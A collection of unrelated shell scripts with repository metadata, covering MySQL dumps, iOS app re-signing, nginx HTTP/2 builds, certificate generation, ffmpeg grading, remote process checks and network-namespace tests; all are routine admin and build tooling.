981767c6de7fbec47e07c3610dffefd6c3ab0002 | Shell | lbrayner/mysql_tools | /mysql_dump.sh | UTF-8 | 1,124 | 4.09375 | 4 | [] | no_license | #!/bin/sh
# Dump a MySQL database (remaining args are passed to mysqldump) into a
# timestamped .sql file, zip it into the destination folder, and clean up.
set -e
# set -x
script_name="$(basename "${0}")"
# Print the usage synopsis (the trailing backslash continues the string).
print_usage() {
printf '\n%s\n' "${script_name} [-h] [-d FOLDER] [-c CLASSIFIER] [-p TEMPDIR]\
[-- ARGS...]"
}
# Timestamp used in the dump file name (%N adds nanoseconds for uniqueness).
generate_timestamp(){
date +'%Y%m%d_%H%M_%N'
}
# At least one argument (the mysqldump target) is required.
if [ ! ${#} -gt 0 ]
then
print_usage 1>&2
exit 1
fi
# Defaults, overridable via the options below.
classifier=""
destination="."
tmpdir="/tmp"
prefix="mysql_dump"
# -c classifier inserted into the file name, -d output folder,
# -p temp dir for the intermediate dump, -h usage.
while getopts ":hc:d:p:" opt
do
case ${opt} in
c)
classifier="${OPTARG}"
;;
d)
destination="${OPTARG}"
;;
p)
tmpdir="${OPTARG}"
;;
h)
print_usage
exit 0
;;
\?)
;;
esac
done
shift $((OPTIND - 1))
# Resolve the destination to an absolute path and validate it.
destination="$(readlink -f "${destination}")"
if [ ! -d "${destination}" ]
then
echo "'${destination}' is not a folder." 1>&2
exit 1
fi
name="${prefix}${classifier}$(generate_timestamp).sql"
# Work inside a private temp dir so partial dumps never land in destination.
dump_file_dir="$(mktemp -d -p "${tmpdir}")"
cd "${dump_file_dir}"
zip_file="${destination}/${name}.zip"
mysqldump --no-tablespaces "${@}" > "${name}"
zip "${zip_file}" "${name}"
cd -
rm -rf "${dump_file_dir}"
| true |
978b104aed8643b05303f15e4a7a1e648ba34ded | Shell | lsmakethebest/LSiOSShell | /resign/resign.sh | UTF-8 | 8,430 | 3.8125 | 4 | [] | no_license |
#!/bin/bash
RED='\033[31m' # 红
GREEN='\033[32m' # 绿
CYAN='\033[36m' # 蓝
RES='\033[0m' # 清除颜色
need_verbose=""
echoRed(){
echo -e "${RED}${1}${RES}"
}
echoGREEN(){
if [[ "$need_verbose" != "" ]]; then
echo -e "${GREEN}${1}${RES}"
fi
}
echoCYAN(){
if [[ "$need_verbose" != "" ]]; then
echo -e "${CYAN}${1}${RES}"
fi
}
echoResult() {
echo -e "${GREEN}${1}${RES}"
}
usage(){
echoResult '请输入参数:'
echoResult '\t必传参数1:ipa目录'
echoResult '\t必传参数2:描述文件目录'
echoResult "\t必传参数3:证书SHA-1值,注意用 \"\" 双引号包起来,因为有可能有空格,内部会自动过滤空格"
echoResult '\t可选参数 -b new_bundle_identifier'
echoResult '\t可选参数 -e entitlements_file 目录用于签名,不指定则使用描述文件里的配置自动生成 entitlements_file'
echoResult '\t可选参数 -v 打印详细日志'
echoResult '\t可选参数 -h 查看使用说明'
}
if [ $# -lt 3 ]; then
usage
exit
fi
original_ipa_file=""
mobileprovision_file=""
certificate_name=""
if ! ([ -f "$1" ]); then
echoRed "参数1:IPA文件不存在 ${1}"
exit
fi
if ! ([ -f "$2" ]); then
echoRed "参数2:描述文件不存在 ${2}"
exit
fi
if ([ "$3" == "" ]); then
echoRed "参数3:证书名称不能为空 ${3}"
exit
fi
original_ipa_file=$1
mobileprovision_file=$2
temp_certificate_name=$3
certificate_name=${temp_certificate_name// /}
user_app_entitlements_file=""
new_bundle_identifier=""
sign_entitlements_file=""
user_app_entitlements=""
shift 3
# 解析参数
while [ "$1" != "" ]; do
case $1 in
-e | --entitlements )
shift
user_app_entitlements_file="$1"
user_app_entitlements="1"
;;
-b | --bundle-id )
shift
new_bundle_identifier="$1"
;;
-n | --version-number )
shift
VERSION_NUMBER="$1"
;;
--short-version )
shift
SHORT_VERSION="$1"
;;
--bundle-version )
shift
BUNDLE_VERSION="$1"
;;
-v | --verbose )
need_verbose="--verbose"
;;
-h | --help )
usage
;;
* )
;;
esac
# Next arg
shift
done
echoGREEN "-----------------输入参数---------------------"
echoGREEN " 即将签名的IPA文件:${original_ipa_file}"
echoGREEN " 使用的描述文件:${mobileprovision_file}"
echoGREEN " 签名证书名称:${certificate_name}"
echoGREEN " 新bundleID:${new_bundle_identifier}"
echoGREEN " entitlements文件目录:${user_app_entitlements_file}"
echoGREEN '---------------------------------------------'
if [[ "$user_app_entitlements" == "1" ]]; then
if ! ([ -e "$user_app_entitlements_file" ]); then
echoRed "-e 参数:plist文件不存在 -> "${3}
exit
else
sign_entitlements_file="$user_app_entitlements_file"
fi
fi
IpaFileName=$(basename "$original_ipa_file" .ipa)
#存放ipa的目录
original_ipa_path=$(dirname "$original_ipa_file")
unzip_path="${original_ipa_path}"/temp_unzip
rm -rf ${original_ipa_path}/${IpaFileName}-resign.ipa
unzip -oq "$original_ipa_file" -d "${unzip_path}"
if ([ "$sign_entitlements_file" == "" ]); then
# 将描述文件转换成plist
mobileprovision_plist="${unzip_path}/mobileprovision.plist"
#生成plist主要是查看描述文件的信息
security cms -D -i "$mobileprovision_file" > "$mobileprovision_plist"
teamId=`/usr/libexec/PlistBuddy -c "Print Entitlements:com.apple.developer.team-identifier" "$mobileprovision_plist"`
application_identifier=`/usr/libexec/PlistBuddy -c "Print Entitlements:application-identifier" "$mobileprovision_plist"`
#描述文件budnleid
mobileprovision_bundleid=${application_identifier/$teamId./}
# echoGREEN '描述文件中的bundleid: '$mobileprovision_bundleid
mobileprovision_entitlements_plist="${unzip_path}/mobileprovision_entitlements.plist"
/usr/libexec/PlistBuddy -x -c "Print Entitlements" "$mobileprovision_plist" > "$mobileprovision_entitlements_plist"
sign_entitlements_file="$mobileprovision_entitlements_plist"
fi
echoGREEN "使用的entitlemetns文件:$sign_entitlements_file"
# Sign one item in place: xx.app, xx.appex, xx.dylib or xx.framework.
# Reads globals: new_bundle_identifier, OldbundleId, mobileprovision_file,
# certificate_name, sign_entitlements_file, need_verbose, unzip_path.
signFile(){
    filePath="$1";
    suffixStr=${filePath##*.};
    newID=$new_bundle_identifier;
    echoCYAN "正在签名 ${filePath}"
    # For app/appex bundles (not frameworks/dylibs) rewrite the bundle ids
    # in Info.plist when a new bundle identifier was requested with -b.
    if [ "$newID" != "" ] && [ "$suffixStr" != "framework" ] && [ "$suffixStr" != "dylib" ];then
        bundleId=$(/usr/libexec/PlistBuddy -c "Print CFBundleIdentifier " "${filePath}/Info.plist")
        ExtensionID=${bundleId/"$OldbundleId"/"$new_bundle_identifier"}
        /usr/libexec/PlistBuddy -c "Set CFBundleIdentifier $ExtensionID" "${filePath}/Info.plist"
        echoCYAN "bundlieId 旧ID:${bundleId} 新ID:${ExtensionID}"
        # Watch companion-app id (present only in watch bundles; errors muted).
        WKCompanionAppBundleIdentifier=`/usr/libexec/PlistBuddy -c "Print WKCompanionAppBundleIdentifier" "${filePath}/Info.plist" 2> /dev/null`
        if [ "$WKCompanionAppBundleIdentifier" != "" ];then
            echoCYAN "WKCompanionAppBundleIdentifier 旧ID:${WKCompanionAppBundleIdentifier} 新ID:${new_bundle_identifier}"
            /usr/libexec/PlistBuddy -c "Set WKCompanionAppBundleIdentifier $new_bundle_identifier" "${filePath}/Info.plist"
        fi
        WKAppBundleIdentifier=`/usr/libexec/PlistBuddy -c "Print NSExtension:NSExtensionAttributes:WKAppBundleIdentifier" "${filePath}/Info.plist" 2> /dev/null`
        if [ "$WKAppBundleIdentifier" != "" ];then
            NEW_WKAppBundleIdentifier=${WKAppBundleIdentifier/"$OldbundleId"/"$new_bundle_identifier"}
            echoCYAN "WKAppBundleIdentifier 旧ID:${WKAppBundleIdentifier} 新ID:${NEW_WKAppBundleIdentifier}"
            /usr/libexec/PlistBuddy -c "Set NSExtension:NSExtensionAttributes:WKAppBundleIdentifier ${NEW_WKAppBundleIdentifier}" "${filePath}/Info.plist"
        fi
    fi
    if [ "$suffixStr" != "dylib" ];then
        rm -rf "${filePath}/_CodeSignature"
        # Copy the provisioning profile into the bundle (Payload dir).
        cp "$mobileprovision_file" "${filePath}/embedded.mobileprovision"
    fi
    (/usr/bin/codesign $need_verbose -f -s "$certificate_name" --entitlements="$sign_entitlements_file" "$filePath") || {
        echoRed "签名失败 ${filePath}"
        rm -rf "${unzip_path}"
        # Bug fix: a plain "exit" here returned the status of the preceding
        # rm (usually 0), so a failed codesign exited with success.
        exit 1
    }
    echoCYAN "签名结束 ${filePath}"
}
AppPackageName=$(ls "${unzip_path}/Payload" | grep ".app$" | head -1)
AppPackageName=$(basename $AppPackageName .app)
echoGREEN '包名:'$AppPackageName
OldbundleId=$(/usr/libexec/PlistBuddy -c "Print CFBundleIdentifier " "${unzip_path}/Payload/${AppPackageName}.app/Info.plist")
echoGREEN '旧bundleid:'$OldbundleId;
echoGREEN '---------------------------------------------'
frameworkPath="${unzip_path}/Payload/${AppPackageName}.app/Frameworks"
if [ -d "${frameworkPath}" ]; then
echoCYAN '存在Frameworks'
echoGREEN '开始签名Frameworks'
for file in "$frameworkPath"/*; do
signFile "$file"
done
echoGREEN '签名Frameworks结束'
fi
PlugInsPath="${unzip_path}/Payload/${AppPackageName}.app/PlugIns"
if [ -d "${PlugInsPath}" ]; then
echoCYAN '存在普通扩展'
echoGREEN '开始签名普通扩展'
for file in "$PlugInsPath"/*; do
signFile "$file"
done
echoGREEN '普通扩展签名结束'
fi
WatchAppPath="${unzip_path}/Payload/${AppPackageName}.app/Watch"
if [ -d "${WatchAppPath}" ]; then
WatchAppName=$(ls ${WatchAppPath} | grep ".app$" | head -1)
watchPlugInsPath=${WatchAppPath}/${WatchAppName}/PlugIns
if [ -d "${watchPlugInsPath}" ]; then
echoCYAN 'Watch APP 存在扩展'
echoGREEN '开始签名Watch App的扩展'
for file in "$watchPlugInsPath"/*; do
signFile "$file"
done
echoGREEN 'Watch App的扩展签名结束'
fi
echoGREEN '存在Watch App'
echoGREEN '开始签名Watch App'
signFile "${WatchAppPath}/${WatchAppName}"
echoGREEN 'Watch App签名结束'
fi
#设置文件共享
#/usr/libexec/PlistBuddy -c "Set :UIFileSharingEnabled true" "${unzip_path}/Payload/${AppPackageName}.app/Info.plist"
echoGREEN '开始签名主App'
signFile "${unzip_path}/Payload/${AppPackageName}.app"
echoGREEN '主App签名结束'
cd "$unzip_path"
echoGREEN '开始压缩生成ipa'
zip -rq "${original_ipa_path}/${IpaFileName}-resign.ipa" ./*
rm -rf "${unzip_path}/"
echoGREEN '压缩完成'
echoGREEN "新IPA目录:${original_ipa_path}/${IpaFileName}-resign.ipa"
echoResult "###################### 重新签名成功 ##############################"
| true |
e982a0ea90c0b08691069b3d294c5535d8b59f92 | Shell | petronny/aur3-mirror | /httpbin-git/PKGBUILD | UTF-8 | 1,229 | 2.9375 | 3 | [] | no_license | # Maintainer: Benjamin A. Shelton <zancarius at gmail _ com>
# Source: https://github.com/zancarius/archlinux-pkgbuilds
pkgname=httpbin-git
pkgver=20130416
pkgrel=1
pkgdesc="HTTP request and response service--useful for unit testing."
arch=(any)
url="https://github.com/kennethreitz/httpbin"
license=(MIT)
conflicts=(python2-httpbin-git)
depends=(
python2-argparse
python2-blinker
python2-decorator
python2-flask
python2-flask-script
python2-gevent
python2-jinja
python2-newrelic
python2-omnijson
python2-raven
python2-werkzeug
)
makedepends=(
git
python2-distribute
)
_gitroot="https://github.com/kennethreitz/httpbin.git"
_gitname="httpbin"
# makepkg build step: clone or update the upstream git mirror, then work on
# a disposable copy so the pristine checkout stays untouched.
build () {
    cd "${srcdir}"
    if [ -d "${_gitname}/.git" ] ; then
        msg "Updating git repository..."
        # Discard any local changes to setup.py first so git pull applies cleanly.
        (cd "${_gitname}" && git checkout setup.py && git pull)
    else
        msg "Cloning git repository..."
        git clone --depth=1 ${_gitroot} ${_gitname}
    fi
    # Build in a separate copy of the checkout.
    cp -a "${_gitname}" "${_gitname}-work"
}
# makepkg package step: install into $pkgdir with python2 distutils and ship
# the upstream LICENSE under /usr/share/licenses (custom license per PKGBUILD).
package () {
    cd "${_gitname}-work"
    python2 setup.py install --root="${pkgdir}/" --optimize=1
    install -Dm0664 "${srcdir}/${_gitname}/LICENSE" "${pkgdir}/usr/share/licenses/${pkgname}/LICENSE"
}
9686192b9ac9d7c93b008acae5271774a93d87c2 | Shell | kmanika/Roboshop_Shell_Project | /user.sh | UTF-8 | 411 | 2.703125 | 3 | [] | no_license | #!/bin/bash
source common.sh
# Function to check whether user is Sudo
check_user
# Verify the s/w install or not, If not installing it
SW_installed_check "nodejs"
New_user_creation "roboshop"
Code_Download "user"
Code_Install "user"
Folder_Rename "user"
print_msg "NPM install"
npm install &>> $Log_file
status_check $?
Config_file_update "user"
Systemd_DNS_update "user"
Daemon_enable
Start_Service "user"
| true |
11332afabd040bbe52244c6672f8ee5dc5102bae | Shell | Andre0512/MonitoringBot | /check_process.sh | UTF-8 | 1,015 | 3.421875 | 3 | [
"MIT"
] | permissive | #!/bin/bash
# Search the global $result (a pgrep listing) for a python3 process whose
# script path ends with $1.  Prints "True <pid>" when found, otherwise
# "False " (trailing space kept for compatibility with callers).
getPid()
{
    local target=$1
    local expr='s/\([0-9]\{1,6\}\) [\/a-zA-Z0-9]*python3 [\/\._a-zA-Z0-9]*'"$target"'/\1/p'
    local found
    found=$(sed -n "$expr" <<< "$result")
    if [ -n "$found" ]; then
        echo "True "$found
    else
        echo "False "
    fi
}
# Dispatcher: check_process.sh <pgrep|fhem> <host> [script-name]
# "pgrep" mode gathers the python3 process list from the chosen host
# (locally or over ssh) into $result and reports via getPid whether the
# given script is running.  "fhem" mode prints the fhem init status.
if [[ "$1" == "pgrep" ]]; then
    if [[ "$2" == "Pi" ]]; then
        result=$(ssh pi@10.5.12.9 "pgrep -a python3")
        getPid $3
    elif [[ "$2" == "local" ]]; then
        result=$(pgrep -a python3)
        getPid $3
    elif [[ "$2" == "Uberspace" ]]; then
        result=$(ssh abasche@abasche.de "pgrep -fl python3")
        getPid $3
    elif [[ "$2" == "FFW" ]]; then
        # NOTE: this host matches plain "python" (not python3) -- the remote
        # presumably runs python2 bots; confirm before changing.
        result=$(ssh ffwoz@feuerwehr-oberzissen.de "pgrep -fl python")
        getPid $3
    elif [[ "$2" == "VPS" ]]; then
        result=$(ssh andre@cloud.abasche.de "pgrep -a python3")
        getPid $3
    fi
elif [[ "$1" == "fhem" ]]; then
    if [[ "$2" == "Pi" ]]; then
        result=$(ssh pi@10.5.12.9 "/etc/init.d/fhem status")
        echo $result
    elif [[ "$2" == "local" ]]; then
        result=$(/etc/init.d/fhem status)
        echo $result
    fi
fi
| true |
80a7f92b8bd8fcb9d91d39b7d468b82cdf3fcfb3 | Shell | roidayan/ovs-tests | /test-eswitch-netdev-in-ns-no-devlink-reload.sh | UTF-8 | 3,073 | 3.78125 | 4 | [] | no_license | #!/bin/bash
#
# Test interoperability of net namesapces and SRIOV/swtichdev mode
#
# [MLNX OFED] RM #3253350: CX6DX Container offload: support PF/Rep inside namespace
#
# This test is for a custom OFED version which supports loading reps in a ns
# via a WA in the driver which allows the reps to be spawned in the NS that
# the uplink netdev is in, rather than the devlink NS.
#
# The test cases are mainly to verify the rules:
# 1. PF/uplink REP can be moved in/out of a network namespace if
# eswitch is not in switchdev mode
# 2. Uplink REP can not be moved to another network namespace if
# eswitch is in switchdev mode
# 3. Representors are not lost/leaked if they were in a network
# namespace that is deleted, instead, they are evacuated to the
# root namespace. Verify no resources are leaked in such a case,
# ensuring afterwards that switchdev mode and SRIOV can be
# disabled, and that the driver can be reloaded.
#
my_dir="$(dirname "$0")"
. $my_dir/common.sh
function cleanup() {
enable_legacy
config_sriov 0
ip netns del ns0 &>/dev/null
sleep 1
}
trap cleanup EXIT
function run() {
cleanup
title "Verify uplink rep $NIC cannot be added to ns if in switchdev mode."
enable_switchdev
ip netns add ns0
ip l set dev $NIC netns ns0 && err "Expected to fail adding $NIC to ns0."
cleanup
title "Verify PF $NIC can be moved among network namespaces if sriov is enabled and in legacy mode."
ip netns add ns0
enable_legacy
config_sriov 2
ip l set dev $NIC netns ns0 2>/dev/null || err "Failed to add $NIC to ns0."
cleanup
title "Verify VF reps would be created inside network namespace that uplink rep is in."
ip netns add ns0
ip l set dev $NIC netns ns0 || err "Failed to add $NIC to ns0."
config_sriov 2
enable_switchdev
local reps_in_ns=1
declare -A role_map=( [$NIC]="Uplink rep" ["eth0"]="VF rep0" ["eth1"]="VF rep1" )
for dev in $NIC eth0 eth1; do
if ! ip netns exec ns0 test -e /sys/class/net/$dev ; then
err "${role_map[$dev]}($dev) is not found in netns ns0."
reps_in_ns=0
fi
done
if [ "$reps_in_ns" == 1 ]; then
title "Verify VF reps are cleaned up from within a net namespace when SRIOV is disabled."
config_sriov 0
for dev in eth0 eth1; do
ip netns exec ns0 test -e /sys/class/net/$dev && err "${role_map[$dev]}($dev) is not destroyed."
done
title "Verify VF reps would be evacuated from the ns upon ns deletion."
config_sriov 2
enable_switchdev
local num_devs_in_ns=`PF_IN_NS=ns0 get_reps_count $NIC`
if [ "$num_devs_in_ns" == 0 ]; then
err "Got 0 reps in ns0"
fi
ip netns del ns0
sleep 1
local num_devs_post_evacuation=`get_reps_count $NIC`
if [ $num_devs_post_evacuation -ne $num_devs_in_ns ]; then
err "Failed to evacuate all reps from ns"
fi
cleanup
reload_modules
fi
}
run
trap - EXIT
cleanup
test_done
| true |
d22fdca5307ff139dafb026235e1a65769b1929d | Shell | othermoon/sonic-field-video | /src/ffmpeg_scripts/effect_remap.sh | UTF-8 | 2,651 | 3.25 | 3 | [
"CC0-1.0"
] | permissive | #!/bin/zsh
# Description:
# Grades a clip using luminosity value and gamma, color gamma and colour levels.
# However, the color levels only impact where the particular color channel is active in the
# CR,CB and (synthetic) CG space. I.E a change in the R value will have no effect if the CR
# channel is negative (i.e. a shade of green) for example.
#
# This input is passed through a normalizer with a long time delay to bracket it.
#
# The result is passed through range limiting lut (reinhard) then a gamut limiter lut
# which tipically results in a soft pleasant look. For details see effect brighten.
#
# The net result is a 'nice video' which is not striking but will have a soft appearance and sort of work
# most of the time for youtube style video where one is not aiming for extreme HDR effects.
#
# Args:
# <video in> <brighten amount> <luma gamma amount> <chroma gamma amount> <green> <blue> <red>
#
# Examples:
#
# Warm summer day: 1.2 1.4 1.7 0.5 0.3 0.5
# Colourised effect: 1.2 1.4 3 0.2 0.2 0.2
# br | lg | cg | gr | bl | rd
# -----+-----+------+-----+-----+-----
# Warm summer day 1.2 | 1.4 | 1.7 | 0.5 | 0.3 | 0.5
# Colourised effect 1.2 | 1.4 | 3.0 | 0.2 | 0.2 | 0.2
# Gentle Old Colour 1.1 | 1.1 | 1.25 | 0.5 | 0.8 | 0.8
# The Waterfall effect 1.2 | 1.4 | 1.5 | 0.6 | 0.6 | 0.6
#
# Out:
# <*-remap-*params*>.nut
#
# Inverse of the chroma-gamma argument ($4).  NOTE: the float division in
# $(( )) works because this script runs under zsh (see the #!/bin/zsh
# shebang above) -- plain bash would reject "1.0/..." here.
cg=$((1.0/${4}))
# Shared encoder settings; presumably defines $exe, $enc, get_lut and
# get_clut used below -- confirm in encoding.sh.
. $(dirname "$0")/encoding.sh
lut=$(get_lut bt2020-limiter)
clut=$(get_clut reinhard)
# Output-name suffix built from the grading parameters; dots are mapped to
# "p" so the name stays filesystem/ffmpeg friendly.
name="remap-$2-$3-$4-$5-$6-$7"
name=$( echo $name | tr . p)
cmd="${exe} -i '${1}' -i '${1}' ${enc} -filter_complex \
\"
[0:v]
zscale=
rin=full:
r=full,
format=yuv444p16le,
normalize=
independence=0:
strength=1:
smoothing=24,
geq=
lum='min(1.0,pow((lum(X,Y)/65535),${3})*${2})*65535':
cr='32767*(1+(if(lt(0,st(1, cr(X,Y)/32767-1)), ${7}, -1*${5})*pow(abs(ld(1)), ${cg})))':
cb='32767*(1+(if(lt(0,st(1, cb(X,Y)/32767-1)), ${6}, -1*${5})*pow(abs(ld(1)), ${cg})))',
zscale=
rin=full:
r=full,
format=gbrpf32le
[vin];
movie='${clut}',
zscale=rin=full:r=full,
format=gbrpf32le
[vc];
[vin][vc]
haldclut=
interp=tetrahedral,
zscale=
rin=full:
r=full,
lut3d=
file='${lut}':
interp=tetrahedral,
zscale=
rin=full:
r=full
[v]
\" -map '[v]' -map 1:a '${1%.*}-${name}.nut'"
echo
echo '================================================================================'
echo Will Run ${cmd}
echo '================================================================================'
echo
echo $cmd > run.sh
. ./run.sh
. $(dirname "$0")/review.sh "${1%.*}-${name}.nut"
| true |
a70f8f0445a3023d764311e98cb702f3777d4e44 | Shell | unimassystem/es-mate | /install | UTF-8 | 406 | 3.3125 | 3 | [] | no_license | #! /bin/bash
. functions
conf='nodes'
loadConfigure $conf
if [ $# -lt 1 ]
then
echo "Usage: $0 cluster_name <IDS(node-1,node-2)>"
listNodes
exit
fi
clusterName=$1
checkClusterName $clusterName
createConf $clusterName
echo $clusterName > .temp/cluster
echo -n 'Press any Key to Continue'
read tmp
if [ $# -eq 1 ]
then
doAllNodes doInstall
else
doListNodes doInstall $2
fi
| true |
28ca8477613f99c438f7468ba4680efc14238d81 | Shell | arshamohan/momlove | /aaa.sh | UTF-8 | 92 | 2.59375 | 3 | [] | no_license | #!/bin/bash
echo " accept two no "
read a b
s=$(expr "$a" + "$b")
echo " sum is :"
echo $s
| true |
b55499868fb681c4e7729031204c57b667e67e8f | Shell | adannawi/ECE-364 | /Prelab01/.svn/text-base/sum.bash.svn-base | UTF-8 | 135 | 3.046875 | 3 | [] | no_license | #! /bin/bash
#
#$Author$
#$Date$
#$HeadURL$
#$Revision$
# Accumulate every numeric command-line argument into SUM.
SUM=0
while [ "$#" -gt 0 ]
do
    SUM=$((SUM + $1))
    shift
done
echo "Result is $SUM" | true |
3ffdc325f59c882505a5aeb7017868e123b3886d | Shell | planetminguez/absinthe-2.0 | /data/common/corona2/com.chronic-dev.greenpois0n.rocky-racoon.preinst | UTF-8 | 524 | 3 | 3 | [
"FSFUL"
] | permissive | #!/bin/sh
SUPPORTED="9B206/iPad1,1
9B206/iPad2,1
9B206/iPad2,2
9B206/iPad2,3
9B206/iPad2,4
9B206/iPad3,1
9B206/iPad3,2
9B206/iPad3,3
9B206/iPhone2,1
9B206/iPhone3,1
9B206/iPhone3,3
9B206/iPhone4,1
9B206/iPod3,1
9B206/iPod4,1
9B208/iPhone3,1"
# Current iOS build (e.g. 9B206) and hardware model (e.g. iPhone4,1).
OS=`sysctl -n kern.osversion`
PROD=`sysctl -n hw.machine`
# dpkg maintainer script: $1 is the action being performed.
case "$1" in
    install|upgrade)
        # Allow the install only when build/model is in the SUPPORTED
        # whitelist defined at the top of this script.
        for I in $SUPPORTED; do
            if [ "$I" == "$OS/$PROD" ]; then
                exit 0
            fi
        done
        echo Sorry, your device/iOS version is not supported...
        exit 1
    ;;
esac
exit 0
| true |
322beddaa44ad3c405476de3039e321ad4372d5f | Shell | SistemaWebBase/base | /scripts/gerar_certificado.sh | ISO-8859-1 | 1,399 | 3.078125 | 3 | [] | no_license | #!/bin/bash
export DIR="../arquivos/privado/certificado/sistemaweb"
#################################################
# GERAR CERTIFICADO DA AUTORIDADE CERTIFICADORA #
#################################################
# Gerar chave da Autoridade Certificadora
if [ ! -f "$DIR/ca.key" ]; then
openssl genrsa -des3 -out $DIR/ca.key 4096
fi
# Gerar certificado X.509
if [ ! -f "$DIR/ca.crt" ]; then
openssl req -new -x509 -days 3650 -key $DIR/ca.key -out $DIR/ca.crt
fi
################################################
# GERAR CERTIFICADO DO SERVIDOR #
################################################
# Gerar chave do servidor
if [ ! -f "$DIR/server.key" ]; then
openssl genrsa -des3 -out $DIR/server.key 4096
fi
# Gerar requisio de certificado
if [ ! -f "$DIR/server.csr" ]; then
openssl req -new -key $DIR/server.key -out $DIR/server.csr
fi
# Assinar certificado do servidor com o certificado raiz
if [ ! -f "$DIR/server.crt" ]; then
openssl x509 -req -days 3650 -in $DIR/server.csr -CA $DIR/ca.crt -CAkey $DIR/ca.key -set_serial 10102014 -out $DIR/server.crt
fi
# Retirar senha da chave privada
if [ ! -f "$DIR/server.insecure.key" ]; then
openssl rsa -in $DIR/server.key -out $DIR/server.insecure.key
fi
# Gerar PKCS#12
if [ ! -f "$DIR/server.pfx" ]; then
openssl pkcs12 -export -in $DIR/server.crt -inkey $DIR/server.key -out $DIR/server.pfx
fi
| true |
3de9c853b4e33b3ed8dbbe80d2e23b5f3922d119 | Shell | IGC-bioinf/phasing_scripts | /reformat_vcf.gz_shapeit.sh | UTF-8 | 265 | 2.6875 | 3 | [] | no_license | cd /home/roma/comp_f
for i in $(ls /home/roma/comp_f)
do
cd $i
for k in $(ls)
do
cd $k
for r in $(ls *.vcf.gz)
do
sample=$(echo $r | sed 's/.vcf.gz//g')
gzip -d $r && bgzip -c ${sample}.vcf > $r
rm ${sample}.vcf
done
cd ../
done
cd ../
done
| true |
5cc2d922b2faa8c1c6f2ec7e6ff8e16c31da8a01 | Shell | wisehead/dev_tools | /gnuplot/mysql/perf/iostat.sh | UTF-8 | 100 | 2.703125 | 3 | [] | no_license | #!/bin/bash
SLEEP_TIME=$1
while [ true ]
do
iostat -xkt 1 1
sleep $((SLEEP_TIME-1))
done
| true |
9a219609e75490fb1aa5c92453d54ee318334529 | Shell | akiitr/unix | /myfor.sh | UTF-8 | 582 | 3.453125 | 3 | [] | no_license | #!/usr/bin/bash bash
#File: myfor.sh
echo "This is the normal example of for loop"
for i in {1..3}
do
echo "Iteration no: $i"
done
echo "The loop can be used upon any list like python"
echo ""
echo "Explicit list:"
for i in image1.jpg image2.jpg image3.jpg
do
echo "This is the Image: $i"
done
echo ""
echo "Array using the () mind the issue of the gap as gap is not welcome in bash near ="
arr=(ak pk jk)
for people in ${arr[*]}
do
echo "This is the NAME: $people"
done
echo ""
echo "Command Substitution:"
for files in $(ls)
do
echo "File in this directry: $files"
done
| true |
3d298958ec5fc1731a47ad9b9aeab085c7ae6c65 | Shell | vrosnet/ack | /modules/src/em_data/new_table | UTF-8 | 1,094 | 3.25 | 3 | [
"LicenseRef-scancode-other-permissive"
] | permissive | #!/bin/sh
set -e
em_table=$1
h=${2-.}
d=${3-.}
set `grep fpseu $em_table`
p=$2
set `grep fmnem $em_table`
m=$2
ed - $em_table <<'A' > X
1,/^$/g/ /s// /gp
A
ed - $em_table <<'A' | awk '{$2=$2+'$p'; print}' > Y
1,/^$/d
1,/^$/g/ /s// /gp
A
ed - $em_table <<'A' | awk '{print $0,'$m'+i++}' > Z
1,/^$/d
1,/^$/d
1,/^$/g/ /s// /gp
A
i=`wc -l <Y`
echo 'lpseu' `expr $i + $p - 1` >>X
i=`wc -l <Z`
echo 'lmnem' `expr $i + $m - 1` >>X
ed - X <<'A' > $h/em_spec.h
g/^/s//#define sp_/p
A
ed - Y <<'A' > $h/em_pseu.h
g/ \(.*\) .*/s// \1/
g/\(.*\) \(.*\)/s//#define ps_\1 \2/p
A
ed - Z <<'A' > $h/em_mnem.h
g/ .* /s// /
g/\(.*\) \(.*\)/s//#define op_\1 \2/p
A
(
echo 'char em_pseu[][4] = {'
ed - Y <<'A'
g/\(...\).*/s// "\1",/p
A
echo '};'
) > $d/em_pseu.c
(
echo 'char em_mnem[][4] = {'
ed - Z <<'A'
g/\(...\).*/s// "\1",/p
A
echo '};'
) > $d/em_mnem.c
(
echo '#include <em_flag.h>
char em_flag[] = {'
ed - Z <<'A' | tr abcdefghijklmnopqrstuvwxyz ABCDEFGHIJKLMNOPQRSTUVWXYZ
g/^... /s///
g/ .*/s///
g/\(.\)\(.\)/s//PAR_\1 | FLO_\2/
g/-/s//NO/g
g/.*/s// &,/p
A
echo '};'
) > $d/em_flag.c
rm X Y Z
| true |
a952ac868a915ecdc3b8c495068d2ef6d8c454d9 | Shell | sunhaikuo/http2 | /http2.sh | UTF-8 | 1,744 | 2.8125 | 3 | [] | no_license | #!/bin/bash
# 使用方法:
# 1.wget 'https://raw.githubusercontent.com/sunhaikuo/http2/master/http2.sh'
# 2.chmod +x http2.sh
# 3../http2.sh
# 注:该脚本只能运行在ubuntu系统,其他系统请自行修改命令
echo "安装依赖库和编译要用到的工具"
sudo apt-get install build-essential libpcre3 libpcre3-dev zlib1g-dev unzip git
echo "安装nginx-ct"
wget -O nginx-ct.zip -c https://github.com/grahamedgecombe/nginx-ct/archive/v1.3.2.zip
unzip nginx-ct.zip
echo "安装ngx_brotli"
sudo apt-get install autoconf libtool automake
git clone https://github.com/bagder/libbrotli
cd libbrotli
# 如果提示 error: C source seen but 'CC' is undefined,可以在 configure.ac 最后加上 AC_PROG_CC
./autogen.sh
./configure
make
sudo make install
cd ../
echo "获取 ngx_brotli 源码"
git clone https://github.com/google/ngx_brotli.git
cd ngx_brotli
git submodule update --init
cd ../
echo "Cloudflare 补丁"
git clone https://github.com/cloudflare/sslconfig.git
echo "获取OpenSSL1.0.2"
wget -O openssl.tar.gz -c https://github.com/openssl/openssl/archive/OpenSSL_1_0_2k.tar.gz
tar zxf openssl.tar.gz
mv openssl-OpenSSL_1_0_2k/ openssl
cd openssl
patch -p1 < ../sslconfig/patches/openssl__chacha20_poly1305_draft_and_rfc_ossl102j.patch
cd ../
echo "获取nginx"
wget -c https://nginx.org/download/nginx-1.11.13.tar.gz
tar zxf nginx-1.11.13.tar.gz
cd nginx-1.11.13/
patch -p1 < ../sslconfig/patches/nginx__1.11.5_dynamic_tls_records.patch
cd ../
echo "编译和安装nginx"
cd nginx-1.11.13/
./configure --add-module=../ngx_brotli --add-module=../nginx-ct-1.3.2 --with-openssl=../openssl --with-http_v2_module --with-http_ssl_module --with-http_gzip_static_module
make
sudo make install
| true |
577524efcea45406eb4c4abcc87fb35353ab9b38 | Shell | makinacorpus/makina-states | /files/etc/init.d/firewalld | UTF-8 | 3,726 | 3.6875 | 4 | [
"BSD-3-Clause"
